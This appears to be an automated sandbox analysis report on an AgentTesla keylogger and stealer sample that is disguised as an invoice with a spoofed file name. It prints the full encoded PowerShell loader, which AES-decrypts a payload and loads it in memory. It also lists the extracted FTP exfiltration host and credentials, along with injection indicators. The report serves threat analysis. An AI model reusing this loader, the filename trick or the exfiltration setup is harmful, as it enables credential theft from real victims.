agenttesla | b3f8261addf5c790f042a51bb1a890a061f12e2b5a69fef4fd096312968129b4

General

Target

invoice‮f؜d؜p؜..exe
Size

1011KB
MD5

e966081889406e72da8e58d5266e11ce
SHA1

2c3dc94621292b3a97904faf476c1f944efbbac8
SHA256

b3f8261addf5c790f042a51bb1a890a061f12e2b5a69fef4fd096312968129b4
SHA512

7f84db74ce0e16667b4509d8563e11bc3f9298dda883bdb43f10a34d8b799ab586118222c597b703ab92666b74715a7c34a169ab98efb9df6567f5576b8dca7f
SSDEEP

24576:MtbIyTFaXPCDslnPQd/MD3ZRfchorKTGLz1:Mt8yhaXqSs/MDp5woCw1

Score

10^/10

agenttesla execution keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.kurtogluendustriyel.com
Port:
21
Username:
[email protected]
Password:
Boss2024@@

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 724 set thread context of 1764	724	powershell.exe	98

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
724	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
724	powershell.exe
724	powershell.exe
724	powershell.exe
724	powershell.exe
724	powershell.exe
1764	msbuild.exe
1764	msbuild.exe
1764	msbuild.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	724	powershell.exe
Token: SeDebugPrivilege	1764	msbuild.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1764	msbuild.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 3328 wrote to memory of 724	3328	invoice‮f؜d؜p؜..exe	83
PID 3328 wrote to memory of 724	3328	invoice‮f؜d؜p؜..exe	83
PID 724 wrote to memory of 1764	724	powershell.exe	98
PID 724 wrote to memory of 1764	724	powershell.exe	98
PID 724 wrote to memory of 1764	724	powershell.exe	98
PID 724 wrote to memory of 1764	724	powershell.exe	98
PID 724 wrote to memory of 1764	724	powershell.exe	98
PID 724 wrote to memory of 1764	724	powershell.exe	98
PID 724 wrote to memory of 1764	724	powershell.exe	98
PID 724 wrote to memory of 1764	724	powershell.exe	98

C:\Users\Admin\AppData\Local\Temp\invoice‮f؜d؜p؜..exe
"C:\Users\Admin\AppData\Local\Temp\invoice‮f؜d؜p؜..exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFAEUALAAgADAAeAA0AEMALAAgADAAeABBADcALAAgADAAeAAzAEIALAAgADAAeABDADcALAAgADAAeAA3ADIALAAgADAAeAA3AEIALAAgADAAeAA2ADkALAAgADAAeABGAEUALAAgADAAeABCAEEALAAgADAAeAAwAEYALAAgADAAeAA2ADkALAAgADAAeABEAEYALAAgADAAeAA1ADkALAAgADAAeAA1ADQALAAgADAAeAA2AEIALAAgADAAeAAxAEQALAAgADAAeAAyADUALAAgADAAeAA0ADUALAAgADAAeABGAEEALAAgADAAeABDADYALAAgADAAeAA2ADIALAAgADAAeAA3ADEALAAgADAAeAA3ADMALAAgADAAeAAyAEQALAAgADAAeABEADUALAAgADAAeAAwAEMALAAgADAAeAA4AEUALAAgADAAeABEADkALAAgADAAeAAyADYALAAgADAAeABCAEEALAAgADAAeAAxAEEAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADcAQgAsACAAMAB4AEEANQAsACAAMAB4ADMARgAsACAAMAB4AEMAOQAsACAAMAB4AEEAMgAsACAAMAB4ADQAQgAsACAAMAB4ADIAMAAsACAAMAB4ADIANAAsACAAMAB4ADUARAAsACAAMAB4AEEAOAAsACAAMAB4ADcAOAAsACAAMAB4ADAARgAsACAAMAB4ADAARQAsACAAMAB4ADUAQQAsACAAMAB4ADEANwAsACAAMAB4ADYAOQApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
  2⤵
  - Suspicious use of SetThreadContext
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:724
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0jpw5z4.kvz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\file-26809.putik

Filesize
21KB

MD5
ab2902899ceee96dbe778d8acc97550f

SHA1
e8030cb72bf7f4bfc43d8012b054c70c26e69c3c

SHA256
3274796b28bded2458df61badeba9ff59cfd3ea2f198bc9314f007b43488fab7

SHA512
f7b46a97d31b0cdef34c93e87153926b2f953d7cef0bf998e87cc6e704e89f345e8cb52cfd79da5a7f81807967caeaf058dd19dd821018df47b7b71705e7be1a

Download Submit
memory/724-22-0x00007FFC02760000-0x00007FFC03221000-memory.dmp

Filesize
10.8MB

Download
memory/724-2-0x000001D6FEFD0000-0x000001D6FEFF2000-memory.dmp

Filesize
136KB

Download
memory/724-12-0x00007FFC02760000-0x00007FFC03221000-memory.dmp

Filesize
10.8MB

Download
memory/724-13-0x00007FFC02760000-0x00007FFC03221000-memory.dmp

Filesize
10.8MB

Download
memory/724-15-0x000001D6E6970000-0x000001D6E697A000-memory.dmp

Filesize
40KB

Download
memory/724-16-0x000001D6FF690000-0x000001D6FF724000-memory.dmp

Filesize
592KB

Download
memory/724-1-0x00007FFC02763000-0x00007FFC02765000-memory.dmp

Filesize
8KB

Download
memory/1764-17-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1764-19-0x0000000005B80000-0x0000000006124000-memory.dmp

Filesize
5.6MB

Download
memory/1764-20-0x0000000005740000-0x00000000057A6000-memory.dmp

Filesize
408KB

Download
memory/1764-21-0x00000000748D0000-0x0000000075080000-memory.dmp

Filesize
7.7MB

Download
memory/1764-18-0x00000000748DE000-0x00000000748DF000-memory.dmp

Filesize
4KB

Download
memory/1764-23-0x0000000006600000-0x0000000006650000-memory.dmp

Filesize
320KB

Download
memory/1764-24-0x00000000066F0000-0x0000000006782000-memory.dmp

Filesize
584KB

Download
memory/1764-25-0x0000000006890000-0x000000000689A000-memory.dmp

Filesize
40KB

Download
memory/1764-26-0x00000000748DE000-0x00000000748DF000-memory.dmp

Filesize
4KB

Download
memory/1764-27-0x00000000748D0000-0x0000000075080000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing